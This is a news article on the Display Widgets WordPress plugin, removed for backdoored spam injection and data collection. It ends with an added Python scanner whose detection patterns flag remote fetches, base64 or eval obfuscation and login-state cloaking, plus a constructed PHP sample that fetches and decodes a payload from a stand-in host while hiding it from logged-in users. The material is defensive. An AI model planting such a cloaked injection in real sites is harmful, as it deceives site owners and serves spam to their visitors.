Display Widgets, a plugin with more than 200,000 active installs, has been removed from WordPress.org due to its authors inserting malicious code. SEO consultant David Law was the first to bring this issue to the attention of the plugin team after discovering that Display Widgets was inserting content into sites from external servers and also collecting visitor data without permission. He posted to the WordPress.org forums several times to warn other users.
Wordfence has been warning its customers about the plugin during the past several months and published a timeline tracking how Display Widgets was removed from WordPress.org on four separate occasions. According to their independent investigation, the plugin included a backdoor that allowed the plugin author to publish spam content to the sites where Display Widgets was installed. It also hid that content from logged-in users, so site administrators browsing their own sites would not see it.
Pagely banned the Display Widgets plugin from its hosting platform this week:
For our customers' safety, we have banned the plugin from our customer sites… The plugin will remain banned on our network until a time that we see someone has taken responsibility for the plugin and the future of patching its code.
Display Widgets had recently changed hands, as it was acquired from the team that created Formidable Forms. The previous owners have issued a warning about the plugin on Twitter, advising users to remove it from their sites.
We don't have a way of contacting users of our old Display Widgets plugin. But if you are using it you should uninstall immediately.
— Formidable Forms (@FormidableForms) September 12, 2017
It is not yet confirmed whether the plugin was acquired solely for the purpose of distributing malware, but its new owners have been fairly persistent about getting it added back to WordPress.org after each of its violations.
Display Widgets Users Advised to Update to Version 2.7 or Remove the Plugin
Users have no way of finding out that they are running malicious code unless they hear about it from their host, security company, or some other third party. They do not receive a notice in the WordPress admin about the plugin having been removed from the directory. Since Display Widgets was a fairly popular plugin, there are likely many sites that still have it active, and those website owners are probably unaware of the spam content they are publishing.
Yesterday the plugin team issued a notice that Display Widgets 2.7 is a clean version that restores the plugin to version 2.0.5 before the malicious code was added:
We will be leaving this version deploying updates, however at this time we will NOT be allowing for its adoption. The second owner has effectively destroyed any trust a person might have in the plugin.
Note: You CANNOT visit the page or download it as a new plugin for a reason. This plugin is done. It’s not supported, it’s not worked on, nothing. So if you have it, upgrade. Otherwise, find something else to use.
Display Widgets is now likely to end up in the graveyard of abandoned plugins, but there are many other options for adding conditional widget display to WordPress sites. Jetpack’s widget visibility module, Widget Options by Phpbits Creative Studio, Custom Sidebars by WPMU Dev, and Content Aware Sidebars are a few popular alternatives on WordPress.org.
The plugin team does not currently disclose why certain plugins have been closed or removed from WordPress.org, but they are working on providing better communication for users. One Meta Trac ticket requests that closed plugins have a public page instead of disappearing completely. In another related ticket, plugin team member Mika Epstein has proposed that when plugins are closed or disabled, there should be a dropdown for WordPress.org admins to select a reason why. She suggested the following as available options:
- Security Issue
- Author Request
- Guideline Violation
- Licensing/Trademark violations
- Merged into Core
The issue with Display Widgets was fairly public as users posted about their investigations on the WordPress.org support forums and various companies issued warnings about it. However, many plugins are disabled without the public knowing why. Even a short explanation like the proposed examples above would be a major improvement over leaving WordPress.org plugin users in the dark. It would assist site owners in knowing whether they need to prioritize looking for an alternative or simply wait until the situation is resolved.
I’m surprised there’s no software check in place that scans the code for disallowed PHP or JS functions (base64_encode(), etc.) when pushing up to the Repo… That would’ve thrown a red flag immediately.
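The behaviour described earlier in the article (content pulled from external servers, spam hidden from logged-in users) and the commenter's suggestion of scanning for suspicious PHP functions both point at the same defensive check: a static pass over a plugin's PHP files that flags the indicators and weighs their combination. The following is an added example written for this article, not code from WordPress.org, Wordfence, or the Display Widgets plugin. The PHP fragments it scans are constructed for illustration and are not the real plugin source; the indicator list and the scoring weights are the author's own heuristics, and `wp_remote_get` and `is_user_logged_in` appear in plenty of legitimate plugins, so a hit is a prompt for manual review rather than proof of malice.

```python
import re
from dataclasses import dataclass
from pathlib import Path
from typing import Dict, Iterable, List, Tuple

# Constructed sample (hypothetical, NOT the real Display Widgets code): a content
# filter that fetches a remote payload, decodes it, and skips the injection for
# logged-in users so the site owner never sees the spam.
SUSPICIOUS_PHP = """<?php
add_filter('the_content', 'dw_inject');
function dw_inject($content) {
    if (is_user_logged_in()) { return $content; }   // hide from site owner
    $r = wp_remote_get('http://example.invalid/feed');
    $payload = base64_decode($r['body']);
    return $content . $payload;
}
"""

# Constructed sample of an unremarkable widget rendering function.
CLEAN_PHP = """<?php
function dw_display($instance) {
    return esc_html($instance['title']);
}
"""

# Indicator name -> pattern. Heuristic choices by this example's author.
INDICATORS: List[Tuple[str, re.Pattern]] = [
    ("remote_fetch", re.compile(r"\b(wp_remote_get|wp_remote_post|file_get_contents|curl_exec)\s*\(")),
    ("obfuscation", re.compile(r"\b(base64_decode|gzinflate|str_rot13|eval)\s*\(")),
    ("logged_in_cloak", re.compile(r"is_user_logged_in\s*\(\s*\)")),
    ("content_filter", re.compile(r"add_filter\s*\(\s*['\"]the_content['\"]")),
]


@dataclass
class Finding:
    indicator: str
    line_no: int
    text: str


def scan_php(source: str) -> List[Finding]:
    """Return every indicator hit in the given PHP source, with its line number."""
    findings: List[Finding] = []
    for line_no, line in enumerate(source.splitlines(), start=1):
        for name, pattern in INDICATORS:
            if pattern.search(line):
                findings.append(Finding(name, line_no, line.strip()))
    return findings


def risk_score(findings: Iterable[Finding]) -> int:
    """Score a file: one point per distinct indicator, plus bonuses for the
    combinations that together describe spam cloaking (a content filter whose
    behaviour depends on login state) and remote payload delivery (network
    fetch plus decoding). Weights are arbitrary and exist to rank files."""
    names = {f.indicator for f in findings}
    score = len(names)
    if {"content_filter", "logged_in_cloak"} <= names:
        score += 2
    if {"remote_fetch", "obfuscation"} <= names:
        score += 2
    return score


def scan_plugin_dir(plugin_dir: str) -> Dict[str, int]:
    """Score every .php file under a plugin directory, highest risk first."""
    scores = {}
    for path in Path(plugin_dir).rglob("*.php"):
        scores[str(path)] = risk_score(scan_php(path.read_text(errors="replace")))
    return dict(sorted(scores.items(), key=lambda kv: kv[1], reverse=True))


if __name__ == "__main__":
    for label, src in (("suspicious", SUSPICIOUS_PHP), ("clean", CLEAN_PHP)):
        hits = scan_php(src)
        print(f"{label}: score={risk_score(hits)}")
        for f in hits:
            print(f"  line {f.line_no} [{f.indicator}] {f.text}")
```

Run against a real plugin with `scan_plugin_dir("/path/to/wp-content/plugins/some-plugin")`; files that combine a content filter with a login-state check, or a remote fetch with a decoder, sort to the top and deserve a human read before the plugin stays active.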